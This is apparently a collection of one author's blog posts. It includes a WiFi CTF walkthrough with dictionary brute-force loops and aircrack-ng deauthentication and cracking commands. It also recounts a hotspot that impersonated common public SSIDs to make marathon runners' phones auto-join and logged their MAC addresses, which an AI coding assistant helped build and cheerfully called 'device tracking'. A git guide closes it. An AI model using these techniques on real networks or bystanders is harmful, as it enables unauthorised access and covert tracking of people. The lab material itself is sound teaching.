WiFi Password Cracking Challenge

In this lab, you will learn how to brute force the WiFi credentials of the CTF_LAB access point. This is the first challenge in the WiFi CTF competition and teaches fundamental concepts of password security and dictionary attacks.

Challenge Objectives:

  • [ ] Find the wifi network
  • [ ] Manually guess some passwords
  • [ ] Find a dictionary
  • [ ] Find a command to use to connect to wifi networks
  • [ ] Figure out how to push the passwords from the dictionary file into the wifi connection command
  • [ ] Launch the attack and discover the credential

BEFORE YOU START

Prerequisites:

  1. The CTF Lab Raspberry Pi must be powered on and running
  2. The WiFi Access Point should be broadcasting (wait ~1-2 minutes after power-on)
  3. You should have a laptop or mobile device capable of WiFi scanning
  4. IMPORTANT: DO NOT PERFORM THIS WORK ON A CORPORATE OR MANAGED LAPTOP. Use a personal computer you own, as security/IT teams may flag hacking tools as malicious software

What You’ll Learn:

  • WiFi network reconnaissance
  • Password dictionary attacks
  • Command-line automation with loops
  • The importance of strong passwords

Discovering the WiFi Network

The Raspberry Pi CTF Lab operates as a WiFi access point that you can practice ethical hacking against. About 1-2 minutes after it is powered on, it will broadcast a WiFi network with the SSID (network name):

CTF_LAB

Finding the Network

You can discover this network from any WiFi-capable device:

On Mobile Devices (iOS/Android):

  • Open Settings → WiFi
  • Look for the network named CTF_LAB in the available networks list

On Mac:

  • Click the WiFi icon in the menu bar
  • Look for CTF_LAB in the network list

On Linux:

# Scan for available networks
nmcli device wifi list

# Or use iwlist
sudo iwlist wlan0 scan | grep -i "ctf_lab"

On Windows:

  • Click the WiFi icon in the system tray
  • Look for CTF_LAB in the available networks

Progress:

  • [x] Find the wifi network
  • [ ] Manually guess some passwords
  • [ ] Find a dictionary
  • [ ] Find a command to use to connect to wifi networks
  • [ ] Figure out how to push the passwords from the dictionary file into the wifi connection command
  • [ ] Launch the attack and discover the credential

Manually Guessing a Password

Now that you’ve found the CTF_LAB network, you can try connecting with some common passwords. Try a few guesses manually:

  • password
  • 12345678
  • admin
  • ctf
  • supervisor

Unless you’re very lucky (or very strategic), you probably won’t guess it immediately. This demonstrates an important security principle: password strength matters.

Why Dictionary Attacks Work

You might wonder why manual guessing is ineffective, but a dictionary attack can succeed. Here’s the key insight:

Password Space vs. Memorable Passwords

  • Total possible passwords: With lowercase letters, uppercase letters, and numbers alone, an 8-character password has over 200 trillion possible combinations (62^8 ≈ 2.2 × 10^14); adding symbols pushes the space even higher
  • Memorable passwords: Most people choose passwords they can remember, which drastically reduces the search space to maybe a few million common choices

Since humans tend to use memorable passwords (dictionary words, names, common phrases), attackers can:

  1. Start with a list of commonly used passwords
  2. Try these first before resorting to true brute force
  3. Often succeed without testing billions of random combinations
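You can sanity-check these numbers yourself with bash integer arithmetic (the character count of 62 assumes letters and digits only):

```shell
# 26 lowercase + 26 uppercase + 10 digits = 62 possible characters per position
chars=62
length=8
space=$((chars ** length))
echo "$space"   # 218340105584896 -- roughly 218 trillion combinations
# A common-password dictionary, by contrast, is only ~10,000 entries.
```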

This is why password managers and randomly generated passwords are so important for real security!

Progress:

  • [x] Find the wifi network
  • [x] Manually guess some passwords
  • [ ] Find a dictionary
  • [ ] Find a command to use to connect to wifi networks
  • [ ] Figure out how to push the passwords from the dictionary file into the wifi connection command
  • [ ] Launch the attack and discover the credential

Finding a Dictionary

Let’s try to find a common password list. You can do this by searching Google for the following phrase:

“10k most common passwords”

You should see a link to a GitHub repository at the following URL:

https://github.com/danielmiessler/SecLists/blob/master/Passwords/Common-Credentials/10k-most-common.txt

Browse to the page and click the button labeled “Raw” on the right side. You can then save the file to your computer by opening the browser’s File menu and selecting “Save As.”

[screenshot]

When you click on Save as, a dialog will show up:

[screenshot]

You’ll need to create a directory for your hacking work. You can do this from within the dialog by clicking New Folder. Name it HackingLab and click Create.

[screenshot]

Then go ahead and click Save. You’ll now have a file called “10k-most-common.txt” in the HackingLab directory. Let’s learn to view the file from the command line. Use Spotlight to open the Terminal by hitting Command and Space simultaneously, then typing “terminal”:

[screenshot]

Change into your HackingLab directory by typing the following:

cd HackingLab

Now that you’re in the HackingLab directory, let’s view the password file:

more 10k-most-common.txt

You’ll see that each row of the file contains a password.

[screenshot]

Hit q to leave the more command.
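If you want to practice the file-inspection commands before the real attack, you can make a tiny stand-in list (the contents below are illustrative) and poke at it the same way:

```shell
# Build a three-line practice list (a stand-in for 10k-most-common.txt)
printf 'password\n12345678\nqwerty\n' > sample-passwords.txt

wc -l < sample-passwords.txt     # 3 -- one password per line
head -n 1 sample-passwords.txt   # password
```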

Progress:

  • [x] Find the wifi network
  • [x] Manually guess some passwords
  • [x] Find a dictionary
  • [ ] Find a command to use to connect to wifi networks
  • [ ] Figure out how to push the passwords from the dictionary file into the wifi connection command
  • [ ] Launch the attack and discover the credential

Finding a Command to Connect to WiFi Networks

Now we have a password list – we need to figure out how to automate connection attempts. The approach varies by operating system:

Mac OS

Search Google for “Connect to wifi from command line mac” to find resources. Here are the key commands:

Scan for networks:

/System/Library/PrivateFrameworks/Apple80211.framework/Versions/Current/Resources/airport -s

Connect to a network:

networksetup -setairportnetwork en0 <SSID_OF_NETWORK> <PASSWORD>

Try running the airport -s command to see available networks. You should see CTF_LAB in the list. (Note: recent macOS releases have deprecated the airport utility; if it’s missing on your machine, search for current alternatives for scanning from the command line.)

Testing a single password:

networksetup -setairportnetwork en0 CTF_LAB somepassword

When you run this, your WiFi will disconnect temporarily. If the password is wrong, you’ll see an error message.

Linux

Using nmcli (NetworkManager):

# Scan for networks
nmcli device wifi list

# Connect to network
nmcli device wifi connect CTF_LAB password somepassword

Using wpa_supplicant (manual):

# Create config
wpa_passphrase CTF_LAB somepassword > /tmp/wpa.conf

# Connect
sudo wpa_supplicant -B -i wlan0 -c /tmp/wpa.conf

Windows (PowerShell)

# View available networks
netsh wlan show networks

# Connect to network
netsh wlan connect name="CTF_LAB"

For automated password testing on Windows, you’ll need to create a WiFi profile XML file for each password attempt, which is more complex than on Mac/Linux.
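If you do want to script it, the shape of the loop is: generate a profile XML per candidate password, add it, and try to connect. The XML below is a template reconstructed from memory of the WLAN profile schema; verify the exact fields by exporting a known-good profile with netsh wlan export profile before relying on it:

```shell
# Generate a WPA2-PSK profile file for one candidate password.
# Schema fields are approximate -- check against a real exported profile.
make_profile() {
  local ssid="$1" password="$2"
  cat > profile.xml <<EOF
<?xml version="1.0"?>
<WLANProfile xmlns="http://www.microsoft.com/networking/WLAN/profile/v1">
  <name>${ssid}</name>
  <SSIDConfig><SSID><name>${ssid}</name></SSID></SSIDConfig>
  <connectionType>ESS</connectionType>
  <connectionMode>manual</connectionMode>
  <MSM><security>
    <authEncryption>
      <authentication>WPA2PSK</authentication>
      <encryption>AES</encryption>
      <useOneX>false</useOneX>
    </authEncryption>
    <sharedKey>
      <keyType>passPhrase</keyType>
      <protected>false</protected>
      <keyMaterial>${password}</keyMaterial>
    </sharedKey>
  </security></MSM>
</WLANProfile>
EOF
}

make_profile CTF_LAB somepassword
# On Windows you would then run (per candidate):
#   netsh wlan add profile filename="profile.xml"
#   netsh wlan connect name="CTF_LAB"
```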

Progress:

  • [x] Find the wifi network
  • [x] Manually guess some passwords
  • [x] Find a dictionary
  • [x] Find a command to use to connect to wifi networks
  • [ ] Figure out how to push the passwords from the dictionary file into the wifi connection command
  • [ ] Launch the attack and discover the credential

Automating the Dictionary Attack

Now for the exciting part – we’ll automate the password testing using a loop that tries each password from our dictionary file!

Mac OS Script

At the terminal, type the following lines and hit Enter at the end of each line:

while read passwordfilevalue; do
  networksetup -setairportnetwork en0 CTF_LAB "$passwordfilevalue"
  ifconfig en0 | grep inet
  echo "Tried password: $passwordfilevalue"
done < 10k-most-common.txt

What this script does:

  • while read passwordfilevalue; do – Creates a loop that reads the password list one row at a time
  • networksetup -setairportnetwork en0 CTF_LAB "$passwordfilevalue" – Attempts to connect to CTF_LAB using the current password
  • ifconfig en0 | grep inet – Shows whether the interface received an IP address (a successful connection)
  • echo "Tried password: $passwordfilevalue" – Prints the password we just tried
  • done < 10k-most-common.txt – Feeds the loop from the password dictionary file

How to detect success:

  • When you see an inet line with an IP address (like inet 192.168.4.100), you’ve connected successfully!
  • The password printed immediately before the IP address is the correct one
  • The CTF_LAB network uses the 192.168.4.0/24 subnet, so successful connections will show an IP like 192.168.4.X
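If you’d rather have the loop stop itself, test for success after each attempt and break. The control flow looks like this; try_connect below is a stand-in (with an illustrative secret) for the real networksetup/ifconfig check:

```shell
# Stand-in for a real connection attempt: succeeds only on the right password.
# On a real run, replace this with networksetup + an ifconfig/grep check.
try_connect() { [ "$1" = "letmein" ]; }

# Illustrative mini dictionary
printf 'password\n12345678\nletmein\nqwerty\n' > demo-list.txt

found=""
while read -r candidate; do
  if try_connect "$candidate"; then
    found="$candidate"
    echo "SUCCESS! Password found: $candidate"
    break
  fi
  echo "Failed password: $candidate"
done < demo-list.txt
```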

Linux Script

while read -r passwordfilevalue; do
  if nmcli device wifi connect CTF_LAB password "$passwordfilevalue" >/dev/null 2>&1; then
    echo "SUCCESS! Password found: $passwordfilevalue"
    break
  else
    echo "Failed password: $passwordfilevalue"
  fi
done < 10k-most-common.txt

Advanced: Using Aircrack-ng Suite (Linux)

For a more sophisticated approach, you can capture the WPA2 handshake and crack it offline:

# 1. Put WiFi adapter in monitor mode
sudo airmon-ng start wlan0

# 2. Scan for networks
sudo airodump-ng wlan0mon

# 3. Capture handshake (note the channel and BSSID of CTF_LAB)
sudo airodump-ng -c <channel> --bssid <BSSID> -w ctf_capture wlan0mon

# 4. In another terminal, deauth a client to force handshake
sudo aireplay-ng -0 1 -a <BSSID> wlan0mon

# 5. Once handshake is captured, crack it
aircrack-ng -w 10k-most-common.txt ctf_capture-01.cap

Progress:

  • [x] Find the wifi network
  • [x] Manually guess some passwords
  • [x] Find a dictionary
  • [x] Find a command to use to connect to wifi networks
  • [x] Figure out how to push the passwords from the dictionary file into the wifi connection command
  • [x] Launch the attack and discover the credential

What You Should See

As the script runs, you’ll see:

  • Each password being tried
  • Connection errors for wrong passwords
  • When successful: An IP address in the 192.168.4.X range appears!

The password is somewhere in that 10k common password list. Watch the output carefully to catch the successful connection.

Hint: Think about common passwords related to oversight, management, or authority. The CTF_LAB password is a common English word.

Next Steps

Once you’ve successfully connected to the CTF_LAB WiFi network, you’re ready to:

  1. Scan the network to find a registration resource
  2. Register
  3. Access the dashboard
  4. Begin exploring the web services and system challenges
  5. Start earning points!

Congratulations on completing your first challenge! You’ve learned:

  • WiFi reconnaissance techniques
  • The power of dictionary attacks
  • Why password strength matters
  • Basic bash scripting for automation

Hands-On WiFi Security CTF: Beta Test Experience

Where are you in your security journey? Let’s find out together.

I’m inviting you to beta test my new WiFi security CTF — a deliberately vulnerable Raspberry Pi network that gives you a safe space to truly test what you know, discover what you’re capable of, and chart your path forward.

Visit https://wifictf.patrickmccanna.net to learn more and sign up.

If you’re on the fence about attending, here’s a summary of what you can expect to experience. Be sure to sign up, then show up to Big Block Brewery in Carnation, WA on Sat. Nov 29th between 1-4 pm.

Show up with your laptop or phone, and search for the WiFi network.

The Challenge

A password-protected WiFi network called “CTF_LAB” is your starting point. Your mission:

  1. Gain access to the WiFi network — apply wireless exploitation techniques
  2. Enumerate and understand the network — map what’s running and where
  3. Identify and exploit vulnerabilities — put your knowledge into practice
  4. Achieve persistent root access — prove you can chain exploits effectively
  5. Earn points for successful exploitation — not just for finding things, but for making them work

This lab rewards execution. You get points when your exploits actually work — because that’s what matters in the real world.

Why This Lab Exists

You deserve to know what you’re actually capable of. Not what you think you can do, or what you’ve read about — what you can execute when it counts. This lab gives you that clarity.

Growth happens at the edge of your abilities. This CTF is designed to meet you wherever you are: if you’re just starting out, you’ll learn foundational techniques. If you’re experienced, you’ll get to validate your skills and find the gaps you didn’t know existed. Both are valuable.

Real scenarios build real skills. The vulnerabilities here mirror actual IoT security assessments. The techniques that work here will serve you in professional security work, research, or wherever your curiosity takes you.

Your Experience

You’ll begin outside the network. Getting in might mean capturing and cracking a WPA handshake, or it might mean taking the shortcut and focusing on what comes next — it’s your call.

Once you’re on the network, the real exploration begins. What’s running? Where? How can these services be leveraged? Each vulnerability you discover and exploit opens doors to the next challenge.

This is where you’ll learn the most about yourself. Can you enumerate effectively? Do you recognize exploitation opportunities when you see them? Can you chain attacks together? These aren’t just technical questions — they’re diagnostic. The answers tell you exactly what to learn next.

Hit a wall? The lab includes embedded educational guides that explain concepts and techniques without robbing you of the “aha!” moment. You’ll still need to apply what you learn — because that’s where growth happens. And I’m here if you need a nudge in the right direction.

Who This Is For

This lab is for anyone who’s serious about understanding their own capabilities:

  • Learners who are ready to find out if they can actually do what they’ve been studying
  • Practitioners who want an honest assessment of where they stand
  • The curious who wonder if they’re as capable as they hope they are
  • The ambitious who want to identify what to master next

What You’ll Discover

Every person who takes on this challenge learns something different:

  • You might discover you’re further along than you thought
  • You might find unexpected strengths in areas you hadn’t focused on
  • You might identify specific gaps that, once filled, will level up your entire skillset
  • You might surprise yourself with what you can figure out when the pressure is on

All of these outcomes are wins. Knowing where you stand is the foundation for getting where you want to go.

Begin Your Assessment

The beta test is live. Bring your laptop, your curiosity, and your willingness to be honest with yourself about what you know.

Starting your security journey? This lab will show you what’s possible and give you a clear path forward.

Already experienced? This is your chance to validate your skills against realistic scenarios and find your next growth edge.

Visit wifictf.patrickmccanna.net to participate.

I’m excited to see what you discover!

Reproducible Sneaky Wifi Part 2

Last week I left you with a nail-biter. I ran a sneaky wifi network near a weird marathon in 2018 and I captured close to 200 devices. I reproduced the experiment this fall- how’d it go in 2025? Terrible in some regards, but awesome in terms of prototyping acceleration. An experiment that took 2 months in 2018 took me 4 days in 2025.

Time lapse of runners

The Bad

In the 2025 experiment, I caught a grand total of 18 devices.

Does this mean mobile phones are more secure? Was it the exact same experiment? No!

Low participant turnout: My WiFi hotspot was active starting at 7 am. The marathon was scheduled to start at 8 am, but we didn’t see a single runner until ~9:15 am. When runners did start arriving, there were fewer than in past years: the 2018 marathon spanned two days, while this year’s race was only one day, and the participant cohort was significantly smaller.

Bad SSID choices: This attack depends on your ability to anticipate a WiFi SSID that your targets have an affinity for. The SSID I used in 2018 wasn’t going to work because it has been deprecated. I went with “Starbucks WiFi” initially, but this only caught 2 devices. The lack of “Starbucks WiFi”-tuned devices is an interesting indicator of how times have changed. Mobile phone owners used to need WiFi to use email or browse the web on their phones, because cellular plans did not have unlimited data: you either ran out of data for the month or were hit with a large bill if you used cellular for data. People used to go to coffee shops to “work” on their phones and laptops. Now you’re really there to socialize or caffeinate. I also wonder if Starbucks’ popularity has declined. In the last 10 years, I’ve only drunk Starbucks out of necessity.

So after a couple of hours of watching only 2 attaches, I yielded to temptation and changed the SSID to “xfinitywifi.” The xfinitywifi SSID is a controversial WiFi network vended by Comcast, exclusive to Comcast customers.

You can use wigle.net to see the most popular active SSIDs:

Changing to xfinitywifi felt like desperation! Comcast does not have much presence in the Snoqualmie Valley. I reasoned that most of the runners were probably coming from cities where Comcast is dominant – e.g., Bellevue, Issaquah, and Redmond. I managed to catch 16 more devices over the next 4 hours. The count was so small I didn’t bother to keep my logs. But here are some screenshots to give you a feel for what I experienced:

Raspberry Pi with AWUS036ACH WiFi adapter & home built dual yagis
Paperwhite display
Custom status monitor


This experiment agitated me greatly. I know there are still problems related to wifi offloading- but I only caught 18 devices. I didn’t spend enough time researching SSIDs and the end result was low attaches.

Despite my grumpiness about the data, this experiment was a major success.

Did you notice the external WiFi adapter above? How about the nice Paperwhite display presenting the status of the device? My monitoring script was far more sophisticated than a tail of the hostapd logs. I didn’t have to write this code or fiddle with hostapd configurations or nftables rules. I didn’t have to find the right kernel headers and compile WiFi drivers. I didn’t have to flex my terrible design skills. I knew the features I wanted, and I gave my agents direction on how to deploy them.

I was able to successfully produce an IoT prototype with complex hardware dependencies in 4 days.

The Good


I implemented a working prototype of a custom WiFi hotspot with a Paperwhite display, an external WiFi adapter & a Yagi antenna in 4 days.

Methodology

Claude Code & Pre-prompting strategies

I leveraged Claude Code for most of my work. I created a working directory and invoked Claude with a 1,500-line pre-prompt for requirements analysis and planning. This pre-prompt produced Ansible playbooks that take advantage of my Firmware Development caching containers. The pre-prompt addresses topics related to Requirement Exploration, Architecture Safety, Known Good Deployment Patterns, Domain-Specific Knowledge, and Documentation & Maintenance. I’ve been iterating on this prompt for about 6 weeks across roughly 5 other projects. I constructed a separate 166-line pre-prompt that handles deploying code, code analysis, system access, frameworks for deploying code, systematic troubleshooting, and refactoring the code to address discovered defects.

Development Loop

The normal lifecycle of developing a reliable working prototype seems to take about 3-4 build cycles.

My agent would serially perform the following operations during the build process:

  • Initiate a build
  • Discover defects during build process
  • Troubleshoot them on the recipient system
  • Make corrections to the original build playbooks
  • Resume the build at the corrected defect
  • Complete a working build.

If the build experienced errors, I waited for a complete build and then started again on a fresh recipient image. I kept seeing improvements until the build process ran reliably without errors.

Throttling

My biggest challenge was rate limiting:

My agents hit my 5 hour Anthropic token limit on the $20 plan in about 2 hours. During this 4 day period, I scheduled my day around throttling limits. I tried to make sure that some building happened while I slept. Two days before the marathon, I upgraded to the $200 plan. My iOS screen time report was 1 hour during that week.

I didn’t have to write any code to make this project work. That’s not to suggest that anybody could do this experiment. I was successful because I knew exactly what software libraries I wanted to see deployed and how I wanted them tuned. I regularly had to intervene when the agents proposed bad plans. But I’m now approaching a point where my single board computer development processes are automated. It felt like having a mildly competent apprentice.

Over the last few years, I’ve built a range of Raspberry Pi prototypes. All of them required significant effort. My build process made prototyping faster, but it still took me several months to work out the details of each project:

Making reproducible builds was expensive and typically took 2-3 months. I’d steal spare time on evenings or weekends to work on projects. The greatest costs came from the testing & validation needed to create durable, reproducible firmware images. With a combination of tasteful pre-prompts, custom agents & an automated build process, I can now turn around reproducible firmware builds in less than a week.



1. Software & Hardware Testing Houses

You need repeatable, cost-effective environments to validate new software and hardware under real-world conditions, but setting up and tearing down test rigs is slow, inconsistent, and prone to configuration drift.


2. Managed Security Service Providers (MSSPs)
You need deployable, trusted network nodes inside customer environments for monitoring, detection, and incident response — but sourcing, configuring, and reproducing reliable hardware platforms across dozens of clients eats up valuable engineering time.


3. IoT Manufacturers

You want to prove out your next device concept quickly, with working prototypes that demonstrate connectivity, edge processing, and security — but your in-house teams are bottle-necked by long development cycles and unpredictable integration issues.

4. Agricultural & Rural Networking Providers

You need rugged, affordable devices to extend connectivity into fields, barns, and remote communities — but commercial gear is overpriced, hard to customize, and not designed for rapid prototyping or deployment in challenging environments.

5. Telecom & Network Operators
You need cost-effective, rapidly deployable edge devices for monitoring network performance, testing bandwidth in rural or urban environments, or validating new customer premises equipment—but traditional hardware procurement cycles are too slow and expensive.

6. Smart City & Infrastructure Providers
You’re deploying IoT devices to manage traffic lights, utilities, or environmental sensors across a city, but you need quick, low-cost prototypes to validate integrations before scaling to tens of thousands of units.

7. Educational & Research Institutions
Your students or researchers need reproducible, documented environments for experimentation with hardware, networking, or AI, but setting up reliable builds consumes valuable teaching and research time.

8. Healthcare & MedTech Device Innovators
You’re exploring connected health devices—remote patient monitors, smart diagnostic tools, or secure data collection endpoints—but you need a prototype that proves functionality while meeting strict reliability and security requirements.

9. Defense & Public Safety Contractors
You’re tasked with rapidly developing ruggedized, secure edge devices for field communication, surveillance, or sensor fusion, but your internal teams can’t keep pace with the prototyping demands.

10. Environmental & Energy Monitoring Firms
You need distributed, low-power devices to collect data in harsh or remote environments—forests, farms, offshore rigs, or mines—but your current prototypes fail due to durability or reproducibility issues.

11. Media & Event Production Companies
You want portable, reliable devices for live-streaming, crowd analytics, or on-site Wi-Fi provisioning at concerts and sporting events, but consumer gear isn’t flexible enough and enterprise hardware is overkill.

12. Transportation & Logistics Providers
You’re experimenting with fleet tracking, warehouse automation, or smart inventory systems, but you need a way to test edge hardware integrations quickly before committing to full-scale rollouts.

13. Industrial Automation & Robotics
You need controllers and monitoring systems for robots, conveyors, or factory IoT sensors, but the cost and time of custom PLCs and proprietary systems make it hard to experiment quickly.

14. Consultancies & Systems Integrators
You’re responsible for stitching together hardware and software for your clients, but you lack a streamlined way to spin up reproducible prototypes that demonstrate proof-of-concept value quickly and reliably.

Sneaky wifi near weird marathons (Part 1)

In 2018, I ran a WiFi network with a well-known public SSID off a Raspberry Pi and ended up catching lots of marathoners’ phones. My network was not configured for sniffing – purely attaching. Phones with the right WiFi settings would automatically attach to the network.

My interest was in exploring whether phones promiscuously attach to WiFi networks they recognize. My network didn’t vend Internet access- which means I couldn’t spy on people’s traffic. But I did vend DHCP to anyone who tried to connect, which enabled me to gather some data about devices that attached.

The hotspot wasn’t operated from my house – I had to do a little work to get the network to the runners. I live in the Pacific Northwest. Rain is an issue. Back then, I didn’t know enough antenna theory to broadcast long distances, so my setup was janky. If you looked around, you’d see a Tupperware box left behind during some spring cleaning.

After several weeks of iteration, I was ready for the marathon. The race is called “Beat the Blerch.” The name is a tribute to the desire to quit. Running is about ignoring that desire. The organizers have cake stations and couches out on our trail to tempt people into taking a break. Some runners wear inflatable t-rex costumes. Pretty gross!

I turned my hotspot on and started looking at logs. When you monitor the logs of hostapd, you can see the MAC addresses of the devices that attach. This information can be used to identify the type of device that connected. Over the course of the marathon, I saw an interesting diversity of devices attach:

You can see that Apple dominated the running community. It’s interesting to see a Blackberry device in 2018. Someone was in a committed relationship with their phone!
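If you save the hostapd output, pulling the unique client MACs back out is a short pipeline. The log excerpt below is synthetic (the exact format on your build may differ slightly), but association lines look roughly like this:

```shell
# Synthetic hostapd-style log (format approximated; check your real output)
cat > hostapd-demo.log <<'EOF'
wlan0: STA aa:bb:cc:11:22:33 IEEE 802.11: associated
wlan0: STA aa:bb:cc:11:22:33 IEEE 802.11: disassociated
wlan0: STA de:ad:be:ef:00:01 IEEE 802.11: associated
EOF

# Unique MACs that associated; the first three octets (the OUI)
# identify the device manufacturer.
grep ' associated' hostapd-demo.log | awk '{print $3}' | sort -u
```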

This project worked because carriers have a “WiFi offload” strategy. Unlimited data is relatively new. Carriers were still scrambling to provide transport that met the demand of customers. Phones have been tuned to attach to recognized networks in order to offload traffic during metering. I suspect that some day in the future, data caps will get reintroduced thanks to the popularity of 4k streams on 3 inch displays. Time will tell.

There is another fun property of my data! I can graph the attachment rate of runners passing during the marathon. The slope is steep when we’re at the start of the race. Competitive runners quickly disappear and the slope goes gradual. Our graph is pretty boring till we get to the end of the marathon. Is this because the slowest runners don’t give up?

NO! There’s a 10k happening as well! It happens to turn around at the end of the trestle. The slope in our graph declines because the 10k participants start showing up. Short races are more popular! We see a much more steady rate of attaches as a result. As we move to the right, the marathoners are on their return. The tangent-like shape isn’t because of runner resilience. It’s showing you that the steepest slopes are representing folks doing harder things.

The run spanned two days. The second day was rainy, which significantly dampened participation:

On day 1 I caught about 155 devices, but day 2 only brought us about 40.

This was a fun project – but it was scrappy. When I started off, I didn’t really know how to configure hostapd or dnsmasq. I had to figure out a bunch of implementation details on the fly. I didn’t document my project. It took several weeks and I was lucky. I had enough saved logs and sed magic to generate a cool-looking set of graphs. But compiling the WiFi drivers was a pain. You can see my setup had to be in close proximity to the race. The antenna set was not optimized for outdoor transmission. It was not a reproducible project – and it certainly wasn’t stable.

2025

The annual Blerch marathon ran past my house earlier this month.

Four days before the event, I put a challenge in front of myself: Create a reproducible version of the ‘catcher’ project using my LLM-supported automation

I’m more experienced now and consequently, less interested in proving vulnerabilities. I’d prefer to build enduring solutions. In this case, my goal is rapid delivery of IoT prototypes and projects. Anecdotally, I’ve heard prototyping a first iteration of complex IoT takes between 3-9 months. I would consider developing a project requirements doc, implementing code, implementing unit & integration tests and delivering a working implementation in scope for the first run of a prototype. Keep in mind: there’s considerably more work involved to get from concept to market.

I’ve been building what I guess are my own custom AI “agents” for almost a year. I’ve had some intuition about using different tools for quickly building firmware images that were useful. I’ve recently started experimenting with creating agents that actually deploy and troubleshoot deployments. It’s been working so well that it’s starting to feel weird. Building complex hardware systems quickly shouldn’t be this fast. I suspect I can turn a device around in a single day.

My “Win conditions” are more about creating a reproducible project than proving vulns. I want to prove that I can quickly turn around a complex project prototype. “Complex” in this case means we include peripherals and inter-component integration. This boils down to 3 goals:

  1. Demonstrate the implementation of an external wifi adapter for vending the wifi network. This would require autonomous troubleshooting and configuration tasks related to wifi configuration. There are complex design and implementation decisions that come with activating AP Mode. An AI Agent can speed run that process. It would also demonstrate an Agent’s ability to troubleshoot driver compilation errors.
  2. Implement a paperwhite display that could present status of the pi. This would include status of the wifi network and any attached devices. Most IoT has some kind of interface that people will interact with. I wanted to demonstrate that a peripheral-based UI can be implemented with agents.
  3. Implement the whole project via custom deployment & troubleshooting agents. When I did this last time, I was in my office on weekends and evenings at the expense of spending time with my kids. I wanted to wield my AI towards productivity gains.

How did it work out? Hit refresh for about a week and I’ll include a link to Part 2!

Friday Claude notes

Summary of what we accomplished:

  1. Fixed SSH firewall lockout – Added comprehensive SSH safety rules to iptables
  2. Resolved dnsmasq service issues – Removed problematic systemd override, fixed configuration
  3. Created missing template files – Added device_registration.py.j2 and deployment_record.json.j2
  4. Removed UFW conflicts – Eliminated redundant firewall configuration
  5. Fixed APT sources – Corrected template variables with proper Debian bookworm repositories
  6. Recovered from disabled NetworkManager – Fixed networking and prevented future loss of connectivity
  7. Learned important lessons – Documented the anti-pattern of using ignore_errors as a lazy fix

The Device Catcher deployment is now complete and the playbook is more robust for future runs. The system will properly handle single WiFi interface setups and maintain network connectivity through reboots. Good luck with your marathon device tracking project!

What’s the current todo list?

● The todo list is now empty! We’ve completed all tasks:

✅ Fixed firewall rules blocking SSH on wlan0
✅ Removed lessons learned file processing from Ansible playbooks
✅ Fixed or excluded documentation role with circular references
✅ Fixed dnsmasq configuration to work properly
✅ Fixed networking disabled after reboot
✅ Updated playbook to handle single WiFi interface systems

All deployment issues have been resolved and the Device Catcher system is successfully deployed.

Guidelines for getting better at GIT

I’ve struggled with my git workflows. In the past, I found that I have a bad habit of dramatically editing my projects when I really should fork them. I’ve been putting some effort into building better git habits to help me avoid these situations. I started off being familiar with git init, git commit and git push, but stash and other commands were beyond my grasp. I’ve done some prompt engineering to develop guardrails for the types of development decisions that should be handled with some of the more advanced git use cases. Maybe these will help you!

A couple of safety nets for immediate use:

  • Always be able to undo:
    • See anything you’ve done: git reflog
    • Lightweight “save point”: git tag backup-$(date +%Y%m%d-%H%M%S)
    • Portable snapshot (off-repo backup): git bundle create backup.bundle --all
  • WIP parking lot: prefer WIP commits on a throwaway branch over stash when work will last more than a few minutes. You can do this with the following command:
# from anywhere with uncommitted changes
b="wip/$(date +%Y%m%d-%H%M%S)"; \
git switch -c "$b" && git add -A && git commit -m "WIP: parked" --no-verify && git switch -

1) “Am I rewriting the product?” → Fork vs Branch

  • Use a fork (new repo) when:
    • You’re changing project direction, licensing, or governance.
    • You’ll diverge long-term from upstream (different roadmap) and want to pull upstream occasionally but not merge back regularly.
    • You need independent release cadence and issue tracking.
    • ✨ Tools: git remote add upstream <url>, then git fetch upstream and selective cherry-picks back.
  • Use a new branch (same repo) when:
    • It’s still the same product, just a big feature or refactor.
    • You want CI, PR review, and discoverability to stay in the same place.
    • ✨ Tools: git switch -c feature/refactor-auth, maybe behind a feature flag.

Quick rule: If you’d be uncomfortable merging it back “as-is,” consider a fork. If you’d merge it behind a flag after review, it’s a branch.
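
The fork workflow can be rehearsed entirely with local repositories. In this sketch, $up stands in for the real upstream URL and $fork for your fork; all paths, names, and commit messages are illustrative:

```shell
# Local stand-ins for the real repos: "$up" plays the upstream URL,
# "$fork" plays your fork.
up=$(mktemp -d); fork=$(mktemp -d)
git -C "$up" init -q
git -C "$up" config user.email demo@example.com
git -C "$up" config user.name demo
echo fix > "$up/patch.txt"
git -C "$up" add patch.txt
git -C "$up" commit -qm "upstream: fix"

git -C "$fork" init -q
git -C "$fork" config user.email demo@example.com
git -C "$fork" config user.name demo
git -C "$fork" commit -q --allow-empty -m "fork: init"

cd "$fork"
git remote add upstream "$up"    # wire up the upstream remote
git fetch -q upstream            # see upstream's work
git cherry-pick FETCH_HEAD       # pull one upstream commit, not a full merge
```

The cherry-pick brings over a single upstream change, which matches the "pull upstream occasionally but not merge back regularly" posture of a fork.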


2) “Am I about to experiment wildly?” → Throwaway branch + worktree

  • Create a scratch branch you can nuke anytime:
    git switch -c spike/new-idea
    # or keep the working tree separate so you don't juggle unstaged changes:
    git worktree add ../proj-spike spike/new-idea
  • If it works, cherry-pick useful commits onto a clean feature branch:
    git log --oneline                  # find hashes
    git switch feature/refactor
    git cherry-pick <hash1> <hash2>
  • If it fails, remove the worktree first (a branch checked out in a worktree can't be deleted), then the branch:
    git worktree remove ../proj-spike
    git switch main && git branch -D spike/new-idea

When to prefer git worktree: When you want two branches checked out simultaneously (e.g., bugfix and main) without stashing.
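
The spike-plus-worktree lifecycle can be rehearsed in a throwaway repo (paths and branch names are illustrative). Note the teardown order: the worktree goes first, because git refuses to delete a branch that is still checked out somewhere:

```shell
# Scratch repo standing in for your project
repo=$(mktemp -d); cd "$repo"
git init -q
git config user.email demo@example.com
git config user.name demo
git commit -q --allow-empty -m "init"

# Second checkout in a sibling directory, on its own spike branch
git worktree add -b spike/new-idea "$repo-spike"
git -C "$repo-spike" commit -q --allow-empty -m "spike: experiment"

# Spike failed: tear down the checkout first, then the branch
git worktree remove "$repo-spike"
git branch -D spike/new-idea
```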


3) “My working tree is messy, I need to hop branches” → Stash vs WIP commit

  • Use stash for quick context switches and truly throwaway partial work:
    git stash push -m "WIP: parser tweak"   # saves staged+unstaged
    git switch main && git pull
    git switch feature/parser
    git stash pop   # apply and drop (use `apply` to keep it in the stash)
    • Keep it organized: git stash list, git stash show -p stash@{2}
    • Partial stash: git stash -p
  • Use a WIP commit if:
    • Work spans hours/days or you need team visibility & CI.
    • You want history and easy recovery: git add -A && git commit -m "WIP: parser spike (not for merge)"
    • Later clean history with an interactive rebase (see §7).

